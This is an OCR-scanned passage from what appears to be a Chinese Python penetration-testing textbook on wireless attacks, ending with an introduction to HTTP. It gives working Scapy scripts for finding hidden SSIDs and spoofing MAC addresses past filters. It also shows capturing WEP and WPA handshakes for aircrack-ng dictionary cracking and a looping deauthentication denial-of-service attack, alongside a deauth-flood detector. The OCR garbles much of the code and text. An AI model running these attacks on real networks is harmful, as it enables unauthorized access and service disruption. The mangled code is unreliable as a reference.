另外， 也 可 以 只 查看 连接 到 其 中 某 一 个 热点 的 无 线 设备 ， 
点 的 名 称 进行 判断 ， 修 改 之 后 的 程序 如 下 所 示 。 


from scapy.all import * 
import subprocess 


图 12-13 ”编写 程序 捕获 到 的 Dotl1ProbeResp 
数据 包 


里 只 需要 使 用 fm.info 和 热 


subprocess.call('airmon-ng start wlan0',shell=True) 


interface ='wlan0mon' 
probe req = [i 


ap_name = raw_input ("Please enter the AP name ") 


def probesniff (fm): 


if fm.haslayer (Dot11ProbeResp) : 
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client name = fm.info 
if client_name == ap name: 
if fm.addr2 not in probe req: 
print "New Probe Request: ", client name 
print "MAC ", fm.addr2 
probe _req.append(fm.addr2) 
sniff(iface= interface,prn=probesniff) 


输入 参数 的 时 候 ， 在 出 现 “ New Probe Request” IH À “ TP-LINK 4398”， 然 后 需要 
使 用 一 个 设备 去 连接 这 个 热点 ， 这 时 就 可 以 看 到 类 似 图 12-14 的 输出 。 


New Probe Request: TP-LINK 4938 
MAC b0:95:8e:3c:49:38 


图 12-14 编号 程序 得 到 连接 到 TP-LINK 4398 的 客户 端 地 址 


12.6 扫描 隐藏 的 SSID 


经 常会 看 到 很 多 安全 方面 的 教程 中 提 到 可 以 将 热点 eaan 
隐藏 起 来 ， 这 样 可 以 保证 无 限 网 络 的 安全 。 这 的 确 可 以 Rs hesen 
提高 一 点 儿 安 全 性 , 但 是 并 不 能 仅 此 就 高 枕 无 忧 。 实 际 mat 2 
上 有 很 多 办 法 可 以 找 出 那些 隐藏 的 热点 ， 这 个 原理 实际 [ea ° 


上 是 关闭 了 无 线 信号 的 SSID 广播 ， 使 得 无 线 终端 无 法 
扫描 到 该 路 由 器 的 名 称 ， 如 图 12-15 所 示 。 
作为 渗透 测试 者 ， 也 有 必要 找 出 那些 已 经 被 设置 为 


隐藏 的 热点 ， 因 为 这 些 热点 也 有 可 能 被 黑客 作为 人 侵 的 
入 口 。 检 测 的 方法 是 首先 启动 wlan0mon。 编 写 这 个 程 z= == 
序 的 思路 就 是 : 如 果 一 个 客户 端 去 连接 这 个 隐藏 的 热点 。 图 12.15 创建 一 个 隐藏 SSID 的 热点 


的 时 候 ， 就 会 发 送 “ Probe request” 类 型 的 数据 包 ， 只 
需要 找到 目的 地 址 (Destination ) 为 Broadcast， 并 且 为 “Probe request” 的 数据 包 就 可 找到 隐 
藏 的 SSID 名 称 ， 编 写 的 程序 如 下 所 示 。 


from scapy.all import * 
iface = "wlan0mon" 
def handle_packet (packet) : 
if packet .haslayer (DotllProbeReq) or \ 
packet .haslayer (Dot11ProbeResp) or \ 
packet .haslayer (Dot11AssoReq) : 
print "Found SSID " + packet.info 
print "Sniffing on interface " + iface 
sniff (iface=iface, prn=handle packet) 
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这 个 程序 执行 的 结果 如 图 12-16 所 示 。 


© Console x [BB root@kali:~ 口 Problems Fù PyUnit W root@kali: 


/rooUDocuments/Aptana Studio 3 Workspace/test/test py 
Found SSID ChinaNet-ucTF 
Found SSID ChinaNet-ucTF 
Found SSID ChinaNet-ucTF 


oun 
Found SSID Xiaomi AF64 
Found SSID hidden 

Found SSID 

Found SSID ChinaNet-ucTF 
Found SSID ChinaNet-ucTF 
Found SSID liukai 

Found SSID hidden 

Found SSID 

Found SSID myhack 

Found SSID liukai 

Found SSID hidden 


图 12-16 使 用 UltraISO 打开 Kali Linux 2 的 镜像 文件 


12.7 绕 过 日 标的 MAC 过 滤 机 制 


无 线 网 络 的 管理 者 们 经 常会 采用 过 滤 MAC 地 址 的 方式 ， 例 如 ,下面 的 这 个 路 由 器 就 限 
制 只 有 MAC 地 址 为 00:0A:F5:89:89:FF 的 设备 才能 连接 到 网 络 中 ， 如 图 12-17 所 示 。 


本 页 设置 MAC 地 址 过 济 来 控制 计算 机 对 本 无 线 网 络 的 访问 . 
MAC 地 址 过 淖 功 能 : 已 开启 [AmA] 


r> 
O wit 列表 中 生效 的 MAC 地 址 访问 本 无 线 网 络 
@ 化 主 列表 中 生效 的 MAC 地 址 访问 本 无 线 网 络 


7 2E = —assu 
E777TNIETTTTTNIFEITTTTSIKTTITTN 
Con en Ta] 


图 12-17 对 使 用 无 线 网 络 设备 的 MAC 地 址 进行 了 限定 
不 过 这 种 安全 机 制 很 容易 被 突破 ,黑客 可 以 通过 修改 自己 设备 的 MAC 地 址 ， 达 到 连接 
到 无 线 网 络 的 目的 。 不 过 黑客 有 什么 办 法 才能 知道 管理 者 们 限定 的 MAC 地 址 呢 ? 方法 就 是 
12.5 节 中 介绍 的 扫描 方法 ， 使 用 这 个 程序 监听 目标 无 线 网 络 ， 只 要 一 有 合法 MAC 地 址 的 设 
备 登 录 到 目标 网 络 ， 立 刻 就 可 以 获知 这 个 登录 设备 的 MAC 地 址 。 例 如 ， 图 12-18 就 是 捕获 
到 的 一 个 结果 。 


2017-12-02 62:14:69.776193 
6:6a:f5:89:89:ff 

liukai 

RadioTap / 802.11 Management 4L 00:0a:f5:89:89:ff > ff:ff:ff:ff:ff:ff / DotllProbeReq / SSID='liukai' 


图 12-18 使 用 12.5 节 中 的 程序 获取 的 客户 端 MAC 地 址 
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而 现在 设备 的 MAC 地 址 如 图 12-19 所 示 。 


> ntu 1500 
jelen 1006 (Ethernet) 


uns 0 frame 0 


carrier © collisions 0 


图 12-19 现在 设备 的 MAC 地 址 
修改 设备 MAC 地 址 的 方法 很 简单 ， 命 令 的 格式 为 : 


ifconfig wlan0 hw ether 指定 MAC 地 址 


现在 将 本 机 的 MAC 地 址 修改 为 00:0a:f5:89:89:ff， 通 常 仅仅 是 需要 在 渗透 测试 期 间 将 
MAC 地 址 修改 ， 因 此 无 须 永久 保存 ， 采 用 如 下 的 方法 即 可 (这 种 方法 在 重启 之 后 会 失效 )。 


首先 需要 停止 这 个 网 卡 

root@kali: ~ # ifconfig wlan0 down 

然后 使 用 ifconfig wlan0 hw ether 命令 来 修改 这 个 网 卡 的 硬件 地 址 
root@kali: ~ # ifconfig wlan0 hw ether 00:0a:f5:89:89:ff 
重新 启动 这 个 网 卡 

root@kali: ~ # ifconfig wlan0 up 


使 用 ifconfig 命令 查看 当前 的 网 卡 设置 ， 如 图 12-20 所 示 


mtu 1500 
0 broadcast 192.168.1.255 
Ethernet) 


图 12-20 ifconfig 命令 查看 当前 的 网 卡 设置 


可 以 看 到 这 个 网 卡 的 硬件 地 址 已 经 和 目标 手机 的 MAC 地 址 一 样 了 。 


网 络 ， 就 可 以 成 功 连接 。 


下 面 给 出 了 一 个 可 以 修改 网 卡 地 址 的 完整 程序 


import subprocess 
subprocess.call(' ifconfig wlan0 down',shell=True) 


现在 再 去 连接 目标 


subprocess.call(' ifconfig wlan0 hw ether 00:0a:f5:89:89:ff ',shell=True) 


subprocess.call(' ifconfig wlan0 up',shell=True) 


128 捕获 加 密 的 数据 包 


12.8.1 捕获 WEP 数据 包 
现在 的 无 线 网 络 大 都 采用 密码 访问 的 安全 机 制 ， 现 在 常用 的 加 密 方式 主要 有 WEP、 
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WPA 和 WPA2 几 种 ， 现 在 普遍 都 认为 WEP 是 一 种 不 安全 的 加 密 模式 ， 通 常 只 要 收集 足够 的 
有 效 数据 包 就 可 以 从 数据 包 中 提取 出 密码 碎片 ， 这 样 就 可 以 利用 这 些 密码 碎片 计算 出 WEP 
的 密码 。 接 下 来 编写 一 个 程序 来 专门 收集 网 络 中 的 WEP 加 密 的 数据 包 。 思 路 是 使 用 sniff() 
捕获 在 网 络 中 传播 的 数据 包 ， 如 果 该 数据 包 中 有 Dotl11WEP 属性 ， 就 将 其 存储 在 wep_hand- 
shake.pcap 中 ， 完 整 的 程序 如 下 所 示 。 


import subprocess 

subprocess.call('airmon-ng start wlan0',shell=True) 
import sys 

from scapy.all import * 


iface = "wlan0mon" 
nr_of_wep_packets = 4 
packets = [] 


def handle packet (packet) : 
if packet.haslayer (Dot11WEP) : 
packets .append (packet) 
if len (packets) == nr_of_wep_packets: 
wrpcap ("wep_handshake.pcap", wep_handshake) 
sys.exit (0) 
print "Sniffing on interface " + iface 
sniff (iface=iface, prn=handle_packet) 


不 过 目前 ， 已 经 很 难 找到 使 用 WEP 加 密 的 无 线 网 络 了 。 


12.8.2 ”捕获 WPA 类 型 数据 包 


WPA 是 用 来 替代 WEP 的 。WPA 继承 了 WEP 的 基本 原理 而 又 弥补 了 WEP 的 缺点 : 
WPA 加 强 了 生成 加 密 密 钥 的 算法 ， 因 此 即便 收集 到 分 组 信息 并 对 其 进行 解析 ， 也 几乎 无 法 计 
算出 通用 密 钥 ; WPA 中 还 增加 了 防止 数据 中 途 被 算 改 的 功能 和 认证 功能 。 

现在 已 经 有 人 研究 出 了 针对 WPA 加 密 破解 的 方法 ， 本 书 这 里 不 详细 讲解 破解 的 原理 ， 
只 介绍 一 下 这 个 过 程 。 所 做 的 只 是 捕获 WPA 的 4 次 握手 过 程 产生 的 数据 包 ， 也 就 是 在 建立 
连接 时 的 4 个 EAPOL 类 型 的 数据 包 。 这 需要 有 设备 登录 目标 网 络 时 才能 捕获 ， 所 以 通常 的 
做 法 是 先 对 网 络 进行 攻击 ， 让 客户 端 都 掉 线 ， 然 后 再 监听 网 络 ， 这 时 客户 端 重新 登录 就 会 产 
生 登 录 数据 包 ， 一 个 设备 登录 会 产生 4 个 数据 包 。 

import subprocess 

from scapy.all import * 

subprocess.call('airmon-ng start wlan0',shell=True) 

packets = [] 

def handle packet (pkt) : 

if pkt.haslayer (EAPOL) and pkt.type == 2: 
packets.append (pkt) 


print packet.summary() 
if len(packets) == 4: 
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wrpcap ("wpa handshake.pcap", packets) 
sys.exit (0) 

print "sniffing on interface " + iface 

sniff (iface="wlan0mon", prn=handle packet) 


成 功 捕获 4 个 数据 包 之 后 ， 就 可 以 对 其 进行 破解 。 这 个 破解 的 过 程 需 要 使 用 字典 进行 
计算 ， 这 里 最 好 使 用 专门 的 工具 ， 例 如 Aircrack。 然 后 可 以 使 用 工具 来 破解 握手 包 ， 在 Kali 
Linux 2 中 的 命令 如 下 所 示 。 


aircrack-ng -w dic.txt wep_ handshake.pcap 


小 结 


本 章 中 总 结 了 无 线 网 络 的 各 种 渗透 方式 。 首 先 介绍 了 Python 进行 编程 所 需要 的 模块 文 
件 ， 接 着 讲解 了 如 何 扫描 出 可 以 连接 的 热点 。 在 有 些 时 候 可 能 会 遇见 一 些 隐藏 了 SSID 的 热 


来 捕获 网 络 中 的 无 线 流量 ， 并 对 这 些 流量 分 类 ， 找 出 其 中 使 用 WEP 和 WPA 加 密 的 流量 。 
事实 上 ， 无 线 网 络 确实 并 不 像 大 多 数 人 预计 的 那么 安全 。 本 章 中 以 实例 的 形式 介绍 了 几 
个 使 用 Python 编写 的 程序 ， 这 些 程序 可 以 有 效 地 帮助 我 们 完成 渗透 任务 。 
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在 第 12 章 中 开始 了 对 无 线 网 络 渗透 的 学 习 ， 在 本 章 将 继续 对 这 个 内 容 的 学 习 。 本 章 会 
承接 第 12 章 中 的 内 容 ， 详 细 地 模拟 无 线 网 络 中 客户 端 与 服务 端的 连接 过 程 。 另 外 ， 本 章 也 
将 介绍 如 何 发 起 断 开 客户 端 连接 的 过 程 。 

本 章 将 就 如 下 几 点 内 容 展 开讲 解 。 

(1 ) 使 用 Python 模拟 无 线 客 户 端的 连接 过 程 。 

(2) 使 用 Python 模拟 AP 的 连接 过 程 。 

(3) 使 用 Python 编写 Deauth 攻击 程序 。 

(4) 使 用 Python 编写 Deauth 攻击 检测 程序 。 


13.1 模拟 无 线 客户 端的 连接 过 程 


第 12 章 介绍 了 无 线 网 络 的 一 些 特点 , 但 是 无 线 网 络 和 有 线 网 络 数据 包 的 格式 完全 不 一 
样 ， 无 线 网 络 数据 包 的 格式 可 以 分 成 管理 、 控 制 和 数据 三 种 不 同类 型 。 其 中 ,进行 监 督 、 管 
理 和 退出 的 数据 包 就 是 控制 类 型 ， 这 也 是 本 章 的 重点 。 这 些 数据 包 与 Scapy 的 对 应 关系 可 以 
参见 12.2.2 节 。 控 制 类 型 的 数据 包 包 括 Probe request. Probe response. Association request. 
Association response, Authentication 和 Deauthentication。 这 里 面 先 就 其 中 的 一 种 进行 介绍 ， 
以 Probe response 为 例 ， 图 13-1 给 出 了 一 个 图 示 。 
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39 bits). 285 bytes captured (2280 bits) on interface © 
y 802 _ a information < adio 

TT Prone Response, FT50S 一 
本 


图 13-1 Probe response 数据 包 的 格式 


这 是 一 个 Probe response 类 型 的 管理 数据 包 ， 可 以 看 到 除了 Frame 之 外 ， 这 个 数据 包 的 
第 一 层 是 Radiotap ， 这 一 层 包括 的 信息 显示 如 图 13-2 所 示 。 


v 802.11 radio information 
PHY type: 802.11b (4) 
Short preamble: False 
Data rate: 1.0 Mb/s 
Channel: 6 
Frequency: 2437 MHz 
Signal strength (dBm): -87 dBm 
» [Duration: 2328 us] 


图 13-2 Radiotap 部 分 的 内 容 
Radiotap 层 包 含 如 信和 号 强度 、 频 率 ， 但 是 在 Scapy 中 填充 这 一 层 很 简单 ， 只 需要 
使 用 RadioTap() 即 可 
Dot11()/Dot11ProbeReq() 构成 了 图 13-2 中 的 IEEE 802.11 Probe Response 部 这 里 使 
H lIs 命令 查看 Dotl10 的 格式 ， 如 图 13-3 所 示 


root@kali: ~ 
File Edt View Search Terminal Help 
# iwconfig wlangnon channel 6 


e0:09:00:00:60:00 


DotllAddr CField = '00:00:00:00:09 60:00:00:00:60:00' 
Dot1lAddr3MACField = '09:00:00:00:09 ('00:00:00:00:00:00' 
Dot11SCField =0 (0) 

Dot1lAddr4MACField = '00:00:00:00:00:00' ('00:00:00:00:00:00' 


图 13-3 Dotl10 函数 的 参数 


这 里 面 的 参数 仍然 很 多 ， 需 要 考虑 的 只 有 subtype, addrl, addr2 和 addr3 。 其 中 ，sub- 
type 和 type 用 来 表示 数据 包 的 控制 类 型 ， 例 如 Probe response 就 是 0x0005。 另 外 ， 这 三 个 地 
址 对 应 的 值 并 不 固定 ， 往 往 和 控制 类 型 有 关 。 不 同 的 子 类 型 会 有 一 些微 小 的 差别 ， 最 为 常见 
的 对 应 类 型 为 。 

(1) 从 AP 发 出 ,addrl 对 应 目的 地 址 addr2 对 应 BSSID addr3 对 应 源 地 址 。 

(2) 发 往 AP，addrl 对 应 BSSID、addr2 对 应 源 地 址 addr3 对 应 目的 地 址 。 

DotllEltO 用 来 传输 数据 ， 这 个 函数 很 简单 ， 它 的 格式 可 以 使 用 ls (Dotl1EltO ) 来 查看 ， 
如 图 13-4 所 示 。 
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File Edit View Search Terminal Help 

ls(Dot11Elt()) 
ID eEnumField 0 (0) 
len š d 0 (None) 


info : S el AS (eh 


图 13-4 DotllEltO 函数 的 参数 


其 中 ，ID 表示 名 称 ，len 表示 长 度 ，info 表示 信息 。 

为 了 更 好 地 了 解 无 线 连接 的 过 程 ， 接 下 来 编写 一 段 模拟 客户 端 连 接 过 程 的 程序 。 这 个 连 
接 建 立 过 程 中 由 客户 端 主动 发 起 的 步骤 有 以 下 三 个 

(1) 客户 端 向 AP 发 送 一 个 Probe 请 求 ， 这 个 Probe 请 求 的 数据 包 构造 格式 如 下 所 示 。 


packet =RadioTap() / Ñ 
Dotll(addrl1='ff:ff:ff:ff:ff:ff', 
addr2=station, addr3=station) / \ 
DotllProbeReq() / \ 
Dot11Elt (ID='SSID', info=ssid, len=len(ssid)) 


(2) 客户 端 向 AP 发 送 一 个 Authentication 请 求 ， 这 个 Authentication 请 求 的 数据 包 格 式 
如 下 所 示 


packet = RadioTap() / \ 
Dotll(subtype=0xb, addrl=bssid, addr2=Client, addr3=bssid) / \ 
DotllAuth (algo=0, seqnum=1, status=0) 


(3) 客户 端 向 AP 发 送 一 个 Association 请 求 ， 这 个 Association 请 求 的 数据 包 格 式 如 下 
所 示 。 


packet = RadioTap() / \ 
Dotll(addrl=bssid, addr2=Client, addr3=bssid) / \ 
DotllAssoReq() / \ 
Dot11Elt (ID='SSID', info=ssid) / \ 
Dot11Elt (ID="Rates", info="\x82\x84\x0b\x16") 


使 用 Python 编写 这 个 连接 建立 过 程 中 三 个 步骤 的 完整 程序 如 下 所 示 。 


#!/usr/bin/python 
from scapy.all import * 
import sys 
if len(sys.argv) != 3: 
print "Usage: WirelessClient <IP> eg: WirelessClient 00:0a:f5:89:89:ff test" 
sys.exit (1) 
Client = sys.argv[1] 
ssid = sys.argv[2] 
iface = "wlan0" 


+ 客户 端 向 AP 发 送 一 个 Probe iñ 
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packet = RadioTap() / \ 
Dot114addel="£frrtfsrfrEf:frfrrrfirrEr, 
addr2=Client, addr3=Client) / \ 
DotllProbeReq() / \ 
Dot11Elt (ID='SSID', info=ssid, len=len(ssid)) 
print "Sending probe request" 
res = srpl(packet, iface=iface) 
bssid = res.addr2 
print "Got answer from " + bssid 
# 客户 端 向 AP 发 送 一 个 Authentication 请 求 
packet = RadioTap() / Ñ 
Dot11 (subtype=0xb, 
addrl=bssid, addr2=Client, addr3=bssid) / \ 
DotllAuth(algo=0, seqnum=1, status=0) 
print "Sending authentication" 
srpl (packet, iface=iface) 
# 客户 端 向 AP 发 送 一 个 Rssociation 请 求 
packet = RadioTap() / Ñ 
Dot11 (addrl=bssid, addr2=Client, addr3=bssid) / \ 
DotllAssoReq() / Ñ 
Dot11Elt (ID='SSID', info=ssid) / \ 
Dot11Elt (ID="Rates", info="\x82\x84\x0b\x16") 
print "Association request" 
srpl (packet, iface=iface) 


13.2 ”模拟 AP 的 连接 行为 


AP 和 客户 端 是 无 线 网 络 的 两 个 部 分 ， 两 者 的 行为 也 是 相互 关联 的 ， 针 对 客户 端的 三 个 
行为 ，AP 也 有 相对 应 的 处 理 。 

(1 ) 客户 端 向 AP 发 送 一 个 Probe 请 求 ，AP 会 回应 一 个 Probe 应 答 。 

(2) 客户 端 向 AP 发 送 一 个 Authentication 请 求 ，AP 会 回应 一 个 Authentication 应 答 。 

(3 ) 客户 端 向 AP 发 送 一 个 Association 请 求 ，AP 会 回应 一 个 Association 应 答 。 

具体 的 做 法 如 下 : 首先 需要 将 网 卡 设置 为 monitor 模式 ， 其 次 使 用 Scapy 中 强大 的 sniff() 
函数 来 捕获 网 络 中 的 流量 ， 最 后 调用 handle packet() 函数 来 处 理 捕获 到 的 每 一 个 数据 包 。 按 
照 前 面 介绍 的 过 程 ， 如 果 捕 获 到 请 求 (Probe request) 类 型 的 数据 包 。 

if packet.haslayer(DotllProbeReq): 

就 调用 send probe response() 函数 来 发 送 响应 数据 包 (probe-response)。 

send_probe_response (packet) 

根据 DotllElt 的 头 部 格式 ， 需 要 定义 SSID Rates, Channel 以 及 扩展 的 传输 率 
(ESRates)。 其 中 ，Rates 的 值 可 以 利用 函数 get rates() 从 请 求 (Probe request) 数据 包 中 获取 ， 
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这 个 函数 会 搜索 整个 数据 包 的 ELT 部 分 来 查找 这 个 速率 。 如 果 在 目标 数据 包 中 没有 搜索 到 这 
个 值 ， 就 可 以 使 用 1Mb、2 Mb 5.5 Mb 和 11Mb 作为 默认 值 。 

如 果 handle packet() 函数 检测 到 捕获 的 为 认证 (authentication ) 数据 包 : 

if packet.haslayer (Dot11Ruth) : 

就 会 调用 函数 send_auth_response。 

send_auth response (packet) 

不 过 这 个 函数 首先 会 检查 这 个 数据 包 是 否 是 本 机 发 出 的 ， 在 认证 阶段 可 以 利用 seqnum 
的 值 来 获悉 该 数据 包 是 请 求 包 ( 1 ) 还 是 应 答 包 (2). 

如 果 捕 获 到 的 数据 包 是 连接 数据 包 (association packet): 


if packet.haslayer(Dot11RssoRed) : 

那么 这 时 就 调用 send association response); 

send association response (packet) 

它 会 创建 一 个 连接 回应 数据 包 。 其 中 AID=2， 它 的 作用 与 认证 阶段 的 seqnum 相 类 似 。 

下 面 分 别 创建 send_probe_response()、send auth_response(packet) 与 send_association _ 
response(packet) 三 个 函数 。 

其 中 ，send_probe_response() 内 容 如 下 所 示 。 


def send probe_response (packet) : 
ssid = packet.info 
rates = get rates (packet) 
channel = "\x07" 
if ssid filter and ssid not in ssid filter: 
return 
print "\n\nSending probe response for " + ssid + \ 
" to " + str(packet[Dotll].addr2) + "Nn" 
cap="ESS+privacy+short-preamble+short-slot" 
resp = RadioTap() / Ñ 
Dot11 (addrl=packet [Dot11] .addr2, 
addr2=mymac, addr3=mymac) / \ 
DotllProbeResp (timestamp=time.time(),cap=cap) / \ 
Dot11Elt (ID='SSID', info=ssid) / \ 
Dot11Elt (ID="Rates", info=rates[0]) / \ 
Dot11Elt (ID="DSset", info=channel) / \ 
Dot11Elt (ID="ESRates", info=rates[1]) 
sendp (resp, iface=iface) 


HH, send auth response(packet) 内 容 如 下 所 示 。 


def send auth response (packet) : 


# 不 要 对 自己 发 出 的 请 求 进行 应 答 
if packet[Dotl1] .addr2 != mymac: 
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print "Sending authentication to " + packet [Dot11] .addr2 
res = RadioTap() / Ñ 
Dot11 (addrl=packet [Dot11] .addr2,addr2=mymac, addr3=mymac) /DotllAuth 
(algo=0, seqnum=2, status=0) 
sendp (res, iface=iface) 


其 中 ，send_association_Tesponse(packeb 内 容 如 下 所 示 。 


def send association _ response (packet) : 

if ssid filter and ssid not in ssid filter: 
return 

ssid = packet.info 

rates = get_rates (packet) 

print "Sending Association response for " + ssid + " to " + packet[Dotll]. 

addr2 

res = RadioTap() / Ñ 
Dot11 (addrl=packet [Dot11] .addr2,addr2=mymac, addr3=mymac) / \ 
DotllAssoResp (AID=2) / Ñ 
Dot11Elt (ID="Rates", info=rates[0]) / \ 
Dot11Elt (ID="ESRates", info=rates[1] 

sendp (res, iface=iface) 


最 后 定义 一 个 主 函 数 ， 这 个 函数 将 会 根据 具体 情况 调用 上 述 的 三 个 函数 来 完成 模拟 AP 
的 连接 过 程 ， eee 


def handle packet (packet): 

sys.stdout.write(".") 

sys.stdout.flush () 

if client_addr and packet.addr2 != client_addr: 
return 

if packet .haslayer (DotllProbeReq) : 

send probe_response (packet) 

elif packet.haslayer(DotllAuth): 
send_auth_response (packet) 

elif packet.haslayer (DotllAssoReq): 
send association response (packet) 


13.3 ”编写 Deauth 攻击 程序 


Deauth 攻击 又 称 为 取消 验证 攻击 ， 在 第 12 章 捕 获 WPA 数据 包 的 时 候 提 到 了 这 种 方法 。 
Deauth 攻击 是 无 线 网 络 拒绝 服务 攻击 的 一 种 形式 ， 这 种 攻击 的 目的 是 向 目标 发 送 一 个 取消 
身份 验证 帧 来 将 客户 端 转 为 未 关联 /未 认证 的 状态 。 这 种 形式 的 攻击 在 打 断 客户 端 无 线 服务 
方面 非常 有 效 和 快捷 。 不 过 ， 客 户 端 在 断 开 连 接 之 后 ， 往 往 会 重新 关联 和 认证 以 再 次 获取 服 
务 。 这 时 就 需要 攻击 者 反复 欺骗 取消 身份 验证 数据 包 才能 实现 攻击 的 目的 。 

这 里 需要 使 用 的 是 Dotl1Deauth() 来 构造 取消 身份 验证 的 数据 包 。 这 个 函数 可 以 接受 
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从 0 到 9 作为 参数 ， 这 里 使 用 3 (表示 AP 离线 )。Dotl10 中 的 dest 是 要 踢 掉 的 设备 MAC， 


bssid 表示 AP。 
完整 的 代码 如 下 所 示 。 


import time 
from scapy.all import * 
iface = "mon0" 
timeout = 1 
if len(sys.argv) < 2: 
print sys.argv[0] + " <bssid> [client]" 
sys.exit(0) 
else: 
bssid = sys.argv[1] 
if len(sys.argv) == 
dest = sys.argv[2] 
else: 
dest = "ff:ff:ff:ff:ff:ff" 
pkt = RadioTap()/Dotll(subtype=Oxc,addrl=dest,addr2=bssid,addr3=bssi 
DotllDeauth (reason=3) 
while True: 
print "sending deauth to " + dest 
sendp (pkt, iface=iface) 
time.sleep (timeout) 


13.4 ”无 线 入 侵 检测 


3) / 


最 后 编写 一 个 程序 ， 这 个 程序 的 作用 是 检测 在 网 络 中 是 否 存在 Deauth 拒绝 服务 攻击 人 
侵 行为 。 其 中 ， 函 数 handle packet() 是 核心 功能 ， 它 将 会 检测 捕获 到 的 数据 包 是 否 为 Deauth 
类 型 的 数据 包 。 这 里 会 将 Deauth 类 型 的 数据 包 的 出 现 次 数 和 源 地 址 记录 在 一 个 列表 中 ， 这 个 
列表 中 有 两 列 其 中 ，deauth_times 用 来 保存 出 现 次 数 ， 用 deauth_addrs 保存 源 地 址 。 这 里 
面 需 要 定义 一 个 阅 值 nr of max_deauth， 当 一 定时 间 内 内 容 相同 的 Deauth 类 型 数据 包 出 现 的 


次 数 高 于 这 个 阔 值 ， 就 认为 这 个 数据 包 是 Deauth 攻击 所 发 出 的 。 


import time 
from scapy.all import * 
iface = "wlan0" 
nr_of max_deauth = 10 
deauth_timespan = 23 
deauths = {} 
# 检测 Deauth 拒绝 服务 攻击 
def handle packet (pkt): 
# 获取 deauth 数据 包 
if pkt.haslayer (DotllDeauth): 
deauths.setdefault (pkt .addr2, []) .append (time.time()) 
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span = deauths[pkt.addr2][-1] - deauths [pkt.addr2] [0] 
# 对 捕获 到 的 deauth 数据 包 进 行 判断 
if len(deauths[pkt.addr2]) == nr of max deauth and \ 
span <= deauth timespan: 
print "Detected deauth flood from: " + pkt.addr2 
del deauths [pkt .addr2] 


小 结 
本 章 继续 了 第 12 章 的 内 容 ， 无 线 网 络 的 安全 问题 是 现在 十 分 热门 的 一 个 问题 。 本 章 中 
首先 使 用 Python 语言 编写 了 在 一 次 连接 过 程 中 客户 端 和 AP 的 各 自行 为 ， 然 后 介绍 了 如 何 利 


用 Python 语言 发 起 网 络 中 的 Deauth 攻击 ， 最 后 给 出 了 一 个 可 以 检测 这 种 攻击 的 程序 。 
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HTTP 是 Hyper Text Transfer Protocol ( 超 文 本 传输 协议 ) 的 缩写 ， 这 也 是 现在 互联 网 上 
最 为 重要 的 协议 。 在 很 多 人 的 心目 中 ，Internet 已 经 等 同 于 HTTP 了 。 

目前 互联 网 上 的 大 部 分 应 用 都 使 用 了 HTTP， 这 些 应 用 包括 但 不 限于 电子 商务 、 搜 索 
引擎 、 论 坛 、 博 客 、 社 交 网络 、 电 子 政务 等 。 谷 歌 甚至 推出 了 一 款 基于 HTTP 的 操作 系统 
Chrome OS， 只 需要 一 个 浏览 器 就 可 以 完成 操作 系统 的 功能 。 如 果 要 将 应 用 程序 发 布 到 互联 
网 上 供 人 使 用 ， 就 可 以 使 用 Web 服务 ， 这 种 程序 也 被 称 为 Web 应 用 ,而 这 种 应 用 使 用 的 就 
是 HITP。 

不 过 ， 正 是 由 于 HITP 的 广泛 应 用 ， 这 个 协议 也 成 了 网 络 安全 的 重 灾区 。 所 以 在 进行 网 

全 渗透 测试 时 ， 对 Web 应 用 的 检查 是 十 分 重要 的 一 个 环节 。 在 本 章 中 将 从 以 下 三 个 主题 
来 展开 对 Web 应 用 进行 渗透 测试 的 学 习 。 

(1) FZ £ HTTP, 

(2 ) Python 对 Web 应 用 进行 渗透 的 模块 。 

(3 ) 使 用 Python 对 Web 应 用 进行 渗透 的 常用 实例 。 


14.1 HTTP 简介 


HTTP 是 一 个 无 状态 的 明文 传输 协议 ， 这 意味 着 每 次 的 请 求 都 是 独立 的 ， 它 的 执行 情况 
和 结果 与 前 后 的 请 求 都 是 没有 关系 的 。 其 实 这 个 协议 在 设计 之 初 主要 考虑 的 因素 是 便捷 ， 而 
没有 考虑 到 安全 。 平 时 上 网 使 用 的 就 是 HITP， 例 如 ， 在 一 个 打开 的 Chrome 浏览 器 的 地 址 
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栏 中 输入 “www.163.com”， 这 就 是 通过 HTTP 完成 的 数据 通信 。 浏 览 器 会 根据 用 户 在 地 址 
栏 中 输入 的 内 容 向 目标 服务 器 发 出 请 求 ， 目 标 服 务 器 在 收 到 请 求 之 后 会 给 出 回应 ， 将 数据 发 
回 给 浏览 器 ， 如 图 14-1 所 示 。 

下 面 更 详细 地 观察 一 下 这 个 数据 通信 的 过 程 。 首 先 在 Kali Linux 2 中 启动 WireShark， 然 
后 设置 一 个 如 下 的 过 滤器 ， 如 图 14-2 所 示 。 


百度 一 下 , 你 就 知道 - Mozilla Firefox 


了 了 8 百度 一 下 nts x + 


(€) a hips: baiducom © ][@@s==ch te 
[Most Visted v Offensive Security 4 Kali Linux '% Kali Docs VKali Tools RBExplot-DB A |ip.addr==220.181.112.244 && http 
图 14-1 浏览 器 打开 一 个 页 面 图 14-2 在 WireShark 中 设置 过 滤器 


捕获 这 次 通信 的 数据 包 ， 可 以 看 到 如 图 14-3 所 示 。 


图 14-3 使 用 WireShark 捕获 到 的 HTTP 数据 包 

从 这 次 通信 可 以 看 到 ， 在 这 个 数据 包 中 显示 了 一 个 “GET /HTTP/1.1” 信 息 。 这 里 面 的 
GET 是 HTTP 方法 中 的 一 个 。HTTP 的 方法 主要 有 如 下 几 个 。 

(1) GET: 请 求 资源 。 

(2) HEAD: 类 似 于 GET 请 求 ， 但 是 只 请 求 页 面 的 首部 。 

(3) POST : 向 指定 资源 提交 数据 进行 处 理 请 求 (例如 提交 表单 或 者 上 传 文件 )。 数 据 被 
包含 在 请 求 体 中 。POST 请 求 可 能 会 导致 新 的 资源 的 建立 和 /或 已 有 资源 的 修改 。 

(4) PUT: 创建 或 者 更 新 资源 。 

(5) DELETE: 请 求 服务 器 删除 指定 的 页 面 。 

(6) CONNECT: HTTP/1.1 协议 中 预 留 给 能 够 将 连接 改 为 管道 方式 的 代理 服务 器 。 

(7) OPTIONS: 列 出 服务 器 支持 的 所 有 方法 、 内 容 类 型 和 编码 方式 。 

(8) TRACE: 回 显 服务 器 收 到 的 请 求 。 

现在 可 以 看 出 在 整个 HITP 中 实际 起 作用 的 只 有 客户 端 (浏览 器 ) 和 服务 端 (服务 器 ) 
两 个 角色 ， 其 中 ， 客 户 端 完成 的 操作 流程 如 图 14-4 所 示 。 


发 送 Request 信 息 
N > 
SS 收 到 Response 信 息 ` 
: ° 
APN 服务 器 


图 14-4 ”服务 器 与 客户 端 之 间 的 连接 
